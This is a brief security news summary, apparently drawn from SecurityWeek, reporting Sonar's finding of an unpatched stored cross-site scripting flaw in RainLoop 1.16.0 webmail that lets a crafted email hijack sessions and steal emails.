According to application security firm Sonar, an unpatched vulnerability in the RainLoop webmail client can be exploited to hijack a user’s session and steal their emails.
Many firms utilize RainLoop, an open-source web-based email client. Using the Shodan search engine, Sonar claimed to have discovered hundreds of internet-exposed instances. RainLoop 1.16.0 is afflicted with a stored cross-site scripting (XSS) vulnerability that can be exploited against default configurations, according to Sonar’s experts.
An attacker might simply send a specially crafted email to a RainLoop user to exploit the bug. When a victim opens the infected email, a hidden JavaScript payload is executed in the browser without any additional user involvement.
Read More: https://www.securityweek.com/unpatched-vulnerability-allows-hackers-steal-emails-rainloop-users
